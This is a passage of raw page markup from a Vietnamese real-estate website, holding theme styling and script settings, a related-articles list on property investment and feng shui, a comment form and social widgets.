categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_spacing":"","f_more_":"","f_title1_font_header":"","f_title1_font_title":"Article title 1","f_title1_font_settings":"","f_title1_font_style":"","f_title1_font_spacing":"","f_title1_":"","f_cat1_font_title":"Article category tag 1","f_cat1_font_settings":"","f_cat1_font_line_height":"","f_cat1_font_style":"","f_cat1_font_spacing":"","f_cat1_":"","f_meta1_font_title":"Article meta info 1","f_meta1_font_settings":"","f_meta1_font_family":"","f_meta1_font_size":"","f_meta1_font_line_height":"","f_meta1_font_style":"","f_meta1_font_weight":"","f_meta1_font_transform":"","f_meta1_font_spacing":"","f_meta1_":"","f_ex1_font_title":"Article excerpt 1","f_ex1_font_settings":"","f_ex1_font_family":"","f_ex1_font_size":"","f_ex1_font_line_height":"","f_ex1_font_style":"","f_ex1_font_weight":"","f_ex1_font_transform":"","f_ex1_font_spacing":"","f_ex1_":"","f_title2_font_title":"Article title 2","f_title2_font_settings":"","f_title2_font_family":"","f_title2_font_size":"","f_title2_font_line_height":"","f_title2_font_style":"","f_title2_font_weight":"","f_title2_font_transform":"","f_title2_font_spacing":"","f_title2_":"","f_cat2_font_title":"Article category tag 2","f_cat2_font_settings":"","f_cat2_font_family":"","f_cat2_font_size":"","f_cat2_font_line_height":"","f_cat2_font_style":"","f_cat2_font_weight":"","f_cat2_font_transform":"","f_cat2_font_spacing":"","f_cat2_":"","f_meta2_font_title":"Article meta info 2","f_meta2_font_settings":"","f_meta2_font_family":"","f_meta2_font_size":"","f_meta2_font_line_height":"","f_meta2_font_style":"","f_meta2_font_weight":"","f_meta2_font_transform":"","f_meta2_font_spacing":"","f_meta2_":"","f_ex2_font_title":"Article excerpt 2","f_ex2_font_settings":"","f_ex2_font_family":"","f_ex2_font_size":"","f_ex2_font_line_height":"","f_ex2_font_style":"","f_ex2_font_weight":"","f_ex2_font_transform":"","f_ex2_font_spacing":"","f_ex2_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","meta_bg":"","title_txt_hover":"","all_underline_height1":"","cat_txt_hover":"","cat_border1":"","cat_border_hover1":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","meta_bg2":"","title_txt2":"","title_txt_hover2":"","all_underline_height2":"","all_underline_color2":"#000","cat_bg2":"","cat_bg_hover2":"","cat_txt2":"","cat_txt_hover2":"","cat_border2":"","cat_border_hover2":"","author_txt2":"","author_txt_hover2":"","date_txt2":"","ex_txt2":"","com_bg2":"","com_txt2":"","rev_txt2":"","audio_btn_color2":"","audio_time_color2":"","audio_bar_color2":"","audio_bar_curr_color2":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_border":"","btn_title":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":2,"header_color":"","color_preset":"","border_top":"","class":"tdi_124","tdc_css_class":"tdi_124","tdc_css_class_style":"tdi_124_rand_style"}'; block_tdi_124.td_column_number = "2"; block_tdi_124.block_type = "td_flex_block_4"; block_tdi_124.post_count = "3"; block_tdi_124.found_posts = "585"; block_tdi_124.header_color = ""; block_tdi_124.ajax_pagination_infinite_stop = ""; block_tdi_124.max_num_pages = "195"; tdBlocksArray.push(block_tdi_124); </script><div class="td-block-title-wrap"><h4 class="td-block-title"><span>Related Articles</span></h4></div><div id=tdi_124 class="td_block_inner td-mc1-wrap"> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/10/25/tien-nhan-roi-nen-dau-tu-bat-dong-san-gi/" rel=" bookmark" class="td-image-wrap " title="Tiền nhàn rỗi nên đầu tư bất động sản gì." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/10/nova-phan-thiet-1-1.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/dau-tu/" class="td-post-category">Đầu tư</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/10/25/tien-nhan-roi-nen-dau-tu-bat-dong-san-gi/" rel="bookmark" title="Tiền nhàn rỗi nên đầu tư bất động sản gì.">Tiền nhàn rỗi nên đầu tư bất động sản gì.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/10/12/cau-hoi-ma-nhan-vien-moi-gioi-bat-dong-san-nhan-duoc-nhieu-nhat/" rel=" bookmark" class="td-image-wrap " title="Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/10/moi-gioi-nha-dat-1.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/phap-ly-bat-dong-san/" class="td-post-category">Pháp lý bất động sản</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/10/12/cau-hoi-ma-nhan-vien-moi-gioi-bat-dong-san-nhan-duoc-nhieu-nhat/" rel="bookmark" title="Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất.">Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/09/27/tranh-pham-toi-ky-khi-dat-giuong-ngu-trong-phong-thuy/" rel=" bookmark" class="td-image-wrap " title="Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/09/phong-thuy-giuong-ngu-1.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/nha-dep/" class="td-post-category">Nhà đẹp</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/09/27/tranh-pham-toi-ky-khi-dat-giuong-ngu-trong-phong-thuy/" rel="bookmark" title="Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy.">Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_124" data-td_block_id="tdi_124"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_124" data-td_block_id="tdi_124"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div> <script> var tdb_login_sing_in_shortcode="on"; </script> <div class="td_block_wrap tdb_single_comments tdi_125 tdb-comm-layout1 td-pb-border-top td_block_template_8" data-td-block-uid="tdi_125" > <style> .tdi_125 .td-block-title > *:before, .tdi_125 .td-block-title > *:after { background-color: #008d7f !important; } </style> <style> /* custom css */ .tdb_single_comments input[type=text]{ min-height: 34px; height: auto; }.tdb_single_comments .comments, .tdb_single_comments .comment-respond:last-child, .tdb_single_comments .form-submit{ margin-bottom: 0; }.is-visually-hidden{ border: 0; clip: rect(0 0 0 0); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; }.tdb-comm-layout3 form, .tdb-comm-layout5 form{ display: flex; flex-wrap: wrap; }.tdb-comm-layout3 .td-form-comment, .tdb-comm-layout5 .td-form-comment, .tdb-comm-layout3 .form-submit, .tdb-comm-layout5 .form-submit{ flex: 0 0 100%; order: 1; }.tdb-comm-layout3 .td-form-author, .tdb-comm-layout3 .td-form-email, .tdb-comm-layout3 .td-form-url{ flex: 0 0 32%; }.tdb-comm-layout5 .td-form-author, .tdb-comm-layout5 .td-form-email{ flex: 0 0 49%; }.tdb-comm-layout5 .td-form-url{ flex: 0 0 100%; }.tdb-comm-leave_reply_top .comments{ display: flex; flex-direction: column; }.tdb-comm-leave_reply_top .td-comments-title{ order: 0; margin-bottom: 14px; }.tdb-comm-leave_reply_top .comment-respond .form-submit{ order: 1; margin-bottom: 21px; }.tdb-comm-leave_reply_top .comment-list{ order: 2; }.tdb-comm-leave_reply_top .comment-pagination{ order: 3; }.tdi_125 cite a:hover{ color: #008d7f; }.tdi_125 .comment-link{ display: inline-block; }.tdi_125 .comment-reply-link:hover, .tdi_125 #cancel-comment-reply-link:hover, .tdi_125 .logged-in-as a:hover{ color: #000000; }.tdi_125 .comment{ border-bottom-style: dashed; }.tdi_125 .comment .children{ border-top-style: dashed; }.tdi_125 .td-comments-title a, .tdi_125 .td-comments-title span{ font-family:Rubik !important;font-size:17px !important;font-weight:500 !important;text-transform:uppercase !important; }.tdi_125 cite{ font-family:Rubik !important;font-size:15px !important;font-weight:500 !important;text-transform:capitalize !important; }.tdi_125 .comment-link, .tdi_125 .comment-edit-link{ font-family:Rubik !important;font-size:11px !important;font-weight:400 !important; }.tdi_125 .comment-content p{ font-family:Rubik !important;font-size:13px !important;font-weight:400 !important; }.tdi_125 .comment-reply-link{ font-family:Rubik !important;font-weight:400 !important;text-transform:uppercase !important; }.tdi_125 .comment-reply-title{ font-family:Rubik !important;font-size:15px !important;font-weight:500 !important;text-transform:uppercase !important; }.tdi_125 input[type=text], .tdi_125 textarea{ font-family:Rubik !important;font-size:13px !important;font-weight:400 !important; }.tdi_125 .comment-form .submit{ font-family:Rubik !important;font-size:13px !important;font-weight:400 !important;text-transform:uppercase !important; }.tdi_125 .comment-form-cookies-consent label, .tdi_125 .logged-in-as, .tdi_125 .logged-in-as a, .tdi_125 .td-closed-comments{ font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important;font-weight:400 !important; }@media (min-width: 767px) { .tdb-comm-layout2 form, .tdb-comm-layout4 form { margin: 0 -10px; } .tdb-comm-layout2 .logged-in-as, .tdb-comm-layout4 .logged-in-as, .tdb-comm-layout2 .comment-form-input-wrap, .tdb-comm-layout4 .comment-form-input-wrap, .tdb-comm-layout2 .form-submit, .tdb-comm-layout4 .form-submit, .tdb-comm-layout2 .comment-respond p, .tdb-comm-layout4 .comment-respond p { padding: 0 10px; } .tdb-comm-layout2 .td-form-author, .tdb-comm-layout2 .td-form-email { float: left; width: 33.3333%; } .tdb-comm-layout2 .td-form-url { width: 33.3333%; } .tdb-comm-layout2 .td-form-url { float: left; } .tdb-comm-layout4 .td-form-author, .tdb-comm-layout4 .td-form-email { float: left; width: 50%; } .tdb-comm-layout3 .td-form-author, .tdb-comm-layout5 .td-form-author, .tdb-comm-layout3 .td-form-email { margin-right: 2%; } }@media (max-width: 767px) { .tdb-comm-layout3 .td-form-author, .tdb-comm-layout3 .td-form-email, .tdb-comm-layout3 .td-form-url, .tdb-comm-layout5 .td-form-author, .tdb-comm-layout5 .td-form-email { flex: 0 0 100%; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_125 .td-comments-title a, .tdi_125 .td-comments-title span{ font-family:Rubik !important;font-size:15px !important;font-weight:500 !important;text-transform:uppercase !important; }.tdi_125 cite{ font-family:Rubik !important;font-size:13px !important;font-weight:500 !important;text-transform:capitalize !important; }.tdi_125 .comment-reply-title{ font-family:Rubik !important;font-size:13px !important;font-weight:500 !important;text-transform:uppercase !important; } } </style><div class="tdb-block-inner td-fix-index"><div class="comments" id="comments"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2022/04/08/kien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://tuvanbds.net/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><div class="clearfix"></div> <div class="comment-form-input-wrap td-form-comment"> <textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true" ></textarea> <label for="comment" class="is-visually-hidden">Comment:</label> <div class="td-warning-comment">Please enter your comment!</div> </div><div class="comment-form-input-wrap td-form-author"> <input class="" id="author" name="author" placeholder="Name:*" type="text" value="" size="30" aria-required='true' /> <label for="author" class="is-visually-hidden">Name:*</label> <div class="td-warning-author">Please enter your name here</div> </div> <div class="comment-form-input-wrap td-form-email"> <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30" aria-required='true' /> <label for="email" class="is-visually-hidden">Email:*</label> <div class="td-warning-email-error">You have entered an incorrect email address!</div> <div class="td-warning-email">Please enter your email address here</div> </div> <div class="comment-form-input-wrap td-form-url"> <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /> <label for="url" class="is-visually-hidden">Website:</label> </div> <p class="comment-form-cookies-consent"> <input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label> </p> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='1807' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p></form> </div><!-- #respond --> </div></div></div></div></div><div class="vc_column tdi_127 wpb_column vc_column_container tdc-column td-pb-span4 td-is-sticky"> <style scoped> /* custom css */ .tdi_127{ vertical-align: baseline; }.tdi_127 > .wpb_wrapper, .tdi_127 > .wpb_wrapper > .tdc-elements{ display: block; }.tdi_127 > .wpb_wrapper > .tdc-elements{ width: 100%; }.tdi_127 > .wpb_wrapper > .vc_row_inner{ width: auto; }.tdi_127 > .wpb_wrapper{ width: auto; height: auto; } </style><div class="wpb_wrapper"><div class="td_block_wrap td_block_social_counter tdi_128 td-social-style8 td-social-boxed td-social-font-icons td-pb-border-top td_block_template_8"> <style> .tdi_128 .td-block-title > *:before, .tdi_128 .td-block-title > *:after { background-color: #dd3333 !important; } /* inline tdc_css att */ .tdi_128{ margin-bottom:38px !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_128{ margin-bottom:30px !important; } } </style> <style> /* custom css */ .td_block_social_counter{ font-family: 'Open Sans', arial, sans-serif; font-weight: bold; font-size: 11px; color: #fff; margin-bottom: 47px; }.td_block_social_counter .td-sp{ position: relative; }.td_block_social_counter .td-sp:after{ content: ''; width: 1px; height: 16px; background-color: rgba(255, 255, 255, 0.1); position: absolute; right: -1px; top: 8px; }.td-social-list{ *zoom: 1; }.td-social-list:before, .td-social-list:after{ display: table; content: ''; line-height: 0; }.td-social-list:after{ clear: both; }.td_social_type{ width: 100%; margin-bottom: 10px; -webkit-transition: background-color 0.20s cubic-bezier(0, 0, 0.58, 1) 0s; transition: background-color 0.20s cubic-bezier(0, 0, 0.58, 1) 0s; }.td_social_type:last-child{ margin-bottom: 0; }.td_social_type:hover .td-social-box{ background-color: #222; }.td_social_type .td_social_info{ padding: 0 0 0 9px; position: relative; top: -12px; }.td_social_type .td-social-box{ height: 32px; position: relative; overflow: hidden; }.td_social_type .td-social-box .td-sp{ display: inline-block; }.td_social_type .td_social_number{ border-left: 1px solid rgba(255, 255, 255, 0.1); padding-left: 9px; }.td_social_type .td_social_button{ float: right; border-left: 1px solid rgba(255, 255, 255, 0.1); padding: 0 14px; margin-top: 8px; top: 9px; height: 16px; line-height: 15px; text-transform: uppercase; }.td_social_type .td_social_button a{ color: #fff; }.td_social_type .td_social_button a:after{ content: ''; display: block; height: 32px; position: absolute; right: 0; top: 0; width: 324px; }.td_social_type .td_social_button a:hover{ color: inherit; text-decoration: none !important; }.td_social_type a{ color: #fff; }.td_social_facebook .td-social-box{ background-color: #516eab; }.td_social_rss .td-social-box{ background-color: #ff6600; }.td_social_soundcloud .td-social-box{ background-color: #ff5419; }.td_social_twitter .td-social-box{ background-color: #29c5f6; }.td_social_vimeo .td-social-box{ background-color: #006599; }.td_social_youtube .td-social-box{ background-color: #e14e42; }.td_social_instagram .td-social-box{ background-color: #417096; }.td_social_pinterest .td-social-box{ background-color: #ca212a; }.td_social_tiktok .td-social-box{ background-color: #009191; }.td-social-boxed .td_social_type{ text-align: center; width: 33.3333%; margin: 0; float: left; }.td-social-boxed .td_social_type .td-social-box{ height: 100px; }.td-social-boxed .td_social_type span{ display: block; width: 100%; padding: 0; }.td-social-boxed .td-sp{ margin-top: 10px; }.td-social-boxed .td-sp::after{ display: none; }.td-social-boxed .td_social_info{ font-size: 17px; top: 0; }.td-social-boxed .td_social_info_name{ font-size: 13px; font-weight: normal; }.td-social-boxed .td_social_button{ opacity: 0; position: absolute; height: 100%; margin-top: 0; top: 0; }.td-social-boxed .td_social_button a:after{ width: 100%; height: 100%; }.td-social-colored .td_social_facebook .td-sp{ background-color: #516eab; }.td-social-colored .td_social_rss .td-sp{ background-color: #ff6600; }.td-social-colored .td_social_soundcloud .td-sp{ background-color: #ff5419; }.td-social-colored .td_social_twitter .td-sp{ background-color: #29c5f6; }.td-social-colored .td_social_vimeo .td-sp{ background-color: #006599; }.td-social-colored .td_social_youtube .td-sp{ background-color: #e14e42; }.td-social-colored .td_social_instagram .td-sp{ background-color: #417096; }.td-social-colored .td_social_pinterest .td-sp{ background-color: #ca212a; }.td-social-colored .td_social_tiktok .td-sp{ background-color: #009191; }.td-social-font-icons .td-sp{ background: none; font-family: 'newspaper', sans-serif; font-size: 14px; text-align: center; font-weight: normal; }.td-social-font-icons .td-sp:before{ position: absolute; top: 0; left: 0; right: 0; line-height: 30px; }.td-social-font-icons .td_social_facebook .td-sp:before{ content: '\e818'; color: #516eab; }.td-social-font-icons .td_social_rss .td-sp:before{ content: '\e828'; color: #ff6600; }.td-social-font-icons .td_social_soundcloud .td-sp:before{ content: '\e82b'; color: #ff5419; }.td-social-font-icons .td_social_twitter .td-sp:before{ content: '\e831'; color: #29c5f6; }.td-social-font-icons .td_social_vimeo .td-sp:before{ content: '\e832'; color: #006599; }.td-social-font-icons .td_social_youtube .td-sp:before{ content: '\e836'; color: #e14e42; }.td-social-font-icons .td_social_instagram .td-sp:before{ content: '\e81d'; color: #417096; }.td-social-font-icons .td_social_pinterest .td-sp:before{ content: '\e825'; color: #ca212a; }.td-social-font-icons .td_social_tiktok .td-sp:before{ content: '\e9d6'; color: #009191; }.td_block_social_counter.td-social-style8{ color: #000; }.td_block_social_counter.td-social-style8 .td-social-list{ margin-left: -8px; margin-right: -8px; }.td_block_social_counter.td-social-style8 .td_social_type .td-social-box{ background-color: transparent; border: 1px solid #ededed; margin: 0 8px 16px; }.td_block_social_counter.td-social-style8 .td_social_type .td_social_button{ margin-top: 7px; }.td_block_social_counter.td-social-style8 .td_social_type a{ color: #000; }.td_block_social_counter.td-social-style8 .td_social_type:hover{ color: #555; }.td_block_social_counter.td-social-style8 .td_social_type:hover .td_social_type a{ color: #555; }.td_block_social_counter.td-social-style8 .td-sp{ font-size: 28px; }.td_block_social_counter.td-social-style8 .td-sp:after{ top: 7px; background-color: #000; opacity: 0.1; }.td_block_social_counter.td-social-style8 .td-sp-twitter{ font-size: 22px; }.td_block_social_counter.td-social-style8 .td_social_button{ border-color: #ededed; }div.tdi_128 .td-block-title a, div.tdi_128 .td-block-title span{ font-family:Rubik !important;font-size:17px !important;font-weight:500 !important;text-transform:uppercase !important; }@media (min-width: 1019px) and (max-width: 1140px) { .td_social_type .td_social_button a:after { width: 300px; } }@media (min-width: 768px) and (max-width: 1018px) { .td_social_type .td_social_button a:after { width: 228px; } }@media (max-width: 767px) { .td_social_type .td_social_button a:after { width: 100%; } }@media (min-width: 768px) and (max-width: 1018px) { .td-social-boxed .td_social_type .td-social-box { height: 70px; } }@media (min-width: 768px) and (max-width: 1018px) { .td-social-boxed .td-sp { margin-top: 4px; } }@media (min-width: 768px) and (max-width: 1018px) { .td-social-boxed .td_social_info { font-size: 13px; top: -12px; } }@media (min-width: 768px) and (max-width: 1018px) { .td-social-boxed .td_social_info_name { top: -17px; font-size: 10px; } }@media (max-width: 767px) { .td_block_social_counter.td-social-style8 .td-social-list { margin-left: -2px; margin-right: -2px; } }@media (min-width: 768px) and (max-width: 1018px) { .td_block_social_counter.td-social-style8 .td_social_type .td-social-box { margin: 0 2px 4px; } }@media (max-width: 767px) { .td_block_social_counter.td-social-style8 .td_social_type .td-social-box { margin: 0 2px 4px; } }@media (min-width: 768px) and (max-width: 1018px) { .td_block_social_counter.td-social-style8 .td-sp { font-size: 21px; } }@media (max-width: 767px) { .td_block_social_counter.td-social-style8 .td-sp { font-size: 28px; } }@media (min-width: 768px) and (max-width: 1018px) { .td_block_social_counter.td-social-style8 .td-sp-twitter { font-size: 18px; } } </style><div class="td-block-title-wrap"><h4 class="td-block-title"><span>Kết nối chúng tôi</span></h4></div><div class="td-social-list"><div class="td_social_type td-pb-margin-side td_social_facebook"><div class="td-social-box"><div class="td-sp td-sp-facebook"></div><span class="td_social_info td_social_info_counter">0</span><span class="td_social_info td_social_info_name">Fans</span><span class="td_social_button"><a href="https://www.facebook.com/#" >Like</a></span></div></div><div class="td_social_type td-pb-margin-side td_social_twitter"><div class="td-social-box"><div class="td-sp td-sp-twitter"></div><span class="td_social_info td_social_info_counter">0</span><span class="td_social_info td_social_info_name">Followers</span><span class="td_social_button"><a href="https://twitter.com/#" >Follow</a></span></div></div><div class="td_social_type td-pb-margin-side td_social_youtube"><div class="td-social-box"><div class="td-sp td-sp-youtube"></div><span class="td_social_info td_social_info_counter">0</span><span class="td_social_info td_social_info_name">Subscribers</span><span class="td_social_button"><a href="https://www.youtube.com/#" >Subscribe</a></span></div></div></div></div> <!-- ./block --><div class="td_block_wrap td-a-rec td-a-rec-id-custom-spot td-a-rec-img tdi_129 td_block_template_1"> <style> /* inline tdc_css att */ .tdi_129{ margin-bottom:40px !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_129{ margin-bottom:20px !important; } } /* phone */ @media (max-width: 767px) { .tdi_129{ margin-bottom:38px !important; } } </style> <style> /* custom css */ .tdi_129.td-a-rec{ text-align: center; }.tdi_129 .td-element-style{ z-index: -1; }.tdi_129 .td-spot-id-spot_img_hidden{ display: none; }.tdi_129 .td-adspot-title{ display: block; } </style><div style="display: inline-block"><span class="td-adspot-title">- Thông tin hữu ích về pháp luật bất động sản -</span><a href="https://tuvanbds.net/category/phap-ly-bat-dong-san/" class="td_spot_img_all"><img src="https://tuvanbds.net/wp-content/uploads/2022/09/phap-ly-bat-dong-san-1.jpg" alt="spot_img" width="300" height="250" /></a></div></div><div class="td_block_wrap td_flex_block_1 tdi_130 td_with_ajax_pagination td-pb-border-top td_block_template_8 td_flex_block" data-td-block-uid="tdi_130" > <style> .tdi_130 .td-block-title > *:before, .tdi_130 .td-block-title > *:after { background-color: #008d7f !important; } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .tdi_130{ margin-bottom:40px !important; } } </style> <style> /* custom css */ .tdi_130 .td-image-wrap{ padding-bottom: 100%; }.tdi_130 .entry-thumb{ background-position: center 50%; }.tdi_130 .td-image-container{ flex: 0 0 30%; width: 30%; display: block; order: 0; }.ie10 .tdi_130 .td-image-container, .ie11 .tdi_130 .td-image-container{ flex: 0 0 auto; }.tdi_130 .td-module-container{ flex-direction: row; border-color: #eaeaea !important; }.ie10 .tdi_130 .td-module-meta-info, .ie11 .tdi_130 .td-module-meta-info{ flex: 1; }.tdi_130 .td-module-meta-info{ padding: 0 0 0 15px; display: flex; flex-direction: column; justify-content: center; border-color: #eaeaea; }.tdi_130 .td-category-pos-above .td-post-category{ align-self: flex-start; }.tdi_130 .td_module_wrap{ padding-left: 20px; padding-right: 20px; padding-bottom: 12px; margin-bottom: 12px; }.tdi_130 .td_block_inner{ margin-left: -20px; margin-right: -20px; }.tdi_130 .td-module-container:before{ bottom: -12px; border-color: #eaeaea; }.tdi_130 .entry-thumb, .tdi_130 .entry-thumb:before, .tdi_130 .entry-thumb:after{ border-radius: 100%; }.tdi_130 .td-post-vid-time{ display: block; }.tdi_130 .td-post-category{ padding: 0px; background-color: rgba(255,255,255,0); color: #000000; font-family:Rubik !important;font-size:11px !important;line-height:1 !important;font-weight:400 !important;text-transform:uppercase !important; }.tdi_130 .td-post-category:not(.td-post-extra-category){ display: inline-block; }.tdi_130 .td-author-photo .avatar{ width: 20px; height: 20px; margin-right: 6px; border-radius: 50%; }.tdi_130 .td-excerpt{ display: none; margin: 0px; column-count: 1; column-gap: 48px; }.tdi_130 .td-audio-player{ opacity: 1; visibility: visible; height: auto; font-size: 13px; }.tdi_130 .td-read-more{ display: none; }.tdi_130 .td-author-date{ display: none; }.tdi_130 .td-post-author-name{ display: none; }.tdi_130 .td-post-date, .tdi_130 .td-post-author-name span{ display: none; }.tdi_130 .entry-review-stars{ display: none; }.tdi_130 .td-icon-star, .tdi_130 .td-icon-star-empty, .tdi_130 .td-icon-star-half{ font-size: 15px; }.tdi_130 .td-module-comments{ display: none; }.tdi_130 .td_module_wrap:nth-last-child(1){ margin-bottom: 0; padding-bottom: 0; }.tdi_130 .td_module_wrap:nth-last-child(1) .td-module-container:before{ display: none; }.tdi_130 .td-post-category:hover{ background-color: rgba(255,255,255,0) !important; color: #008d7f; }.tdi_130 .td-module-title a{ color: #000000; }.tdi_130 .td_module_wrap:hover .td-module-title a{ color: #008d7f !important; }.tdi_130.td_with_ajax_pagination .td-next-prev-wrap a:hover, .tdi_130 .td-load-more-wrap a:hover{ background-color: #008d7f !important; border-color: #008d7f !important; border-color: #008d7f !important; }.tdi_130 .entry-title{ margin: 8px 0 0 0; font-family:Rubik !important;font-size:15px !important;line-height:1.2 !important;font-weight:500 !important; }.tdi_130 .td-block-title a, .tdi_130 .td-block-title span{ font-family:Rubik !important;font-size:17px !important;font-weight:500 !important;text-transform:uppercase !important; }.tdi_130 .td-editor-date, .tdi_130 .td-editor-date .td-post-author-name a, .tdi_130 .td-editor-date .entry-date, .tdi_130 .td-module-comments a{ font-family:Rubik !important; }html:not([class*='ie']) .tdi_130 .td-module-container:hover .entry-thumb:before{ opacity: 0; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ .tdi_130 .td_module_wrap{ padding-bottom: 10px; margin-bottom: 10px; padding-bottom: 10px !important; margin-bottom: 10px !important; }.tdi_130 .td-module-container:before{ bottom: -10px; }.tdi_130 .td_module_wrap:nth-last-child(1){ margin-bottom: 0 !important; padding-bottom: 0 !important; }.tdi_130 .td_module_wrap .td-module-container:before{ display: block !important; }.tdi_130 .td_module_wrap:nth-last-child(1) .td-module-container:before{ display: none !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_130 .td-module-meta-info{ padding: 0 0 0 10px; }.tdi_130 .td_module_wrap{ padding-bottom: 7.5px; margin-bottom: 7.5px; padding-bottom: 7.5px !important; margin-bottom: 7.5px !important; }.tdi_130 .td-module-container:before{ bottom: -7.5px; }.tdi_130 .td_module_wrap:nth-last-child(1){ margin-bottom: 0 !important; padding-bottom: 0 !important; }.tdi_130 .td_module_wrap .td-module-container:before{ display: block !important; }.tdi_130 .td_module_wrap:nth-last-child(1) .td-module-container:before{ display: none !important; }.tdi_130 .entry-title{ margin: 5px 0 0 0; font-family:Rubik !important;font-size:11px !important;line-height:1.2 !important;font-weight:500 !important; }.tdi_130 .td-block-title a, .tdi_130 .td-block-title span{ font-family:Rubik !important;font-size:15px !important;font-weight:500 !important;text-transform:uppercase !important; } } /* phone */ @media (max-width: 767px){ .tdi_130 .td_module_wrap{ width: 100%; float: left; padding-bottom: 12px; margin-bottom: 12px; padding-bottom: 12px !important; margin-bottom: 12px !important; }.tdi_130 .td-module-container:before{ bottom: -12px; }.tdi_130 .td_module_wrap:nth-last-child(1){ margin-bottom: 0 !important; padding-bottom: 0 !important; }.tdi_130 .td_module_wrap .td-module-container:before{ display: block !important; }.tdi_130 .td_module_wrap:nth-last-child(1) .td-module-container:before{ display: none !important; } } </style><script>var block_tdi_130 = new tdBlock(); block_tdi_130.id = "tdi_130"; block_tdi_130.atts = 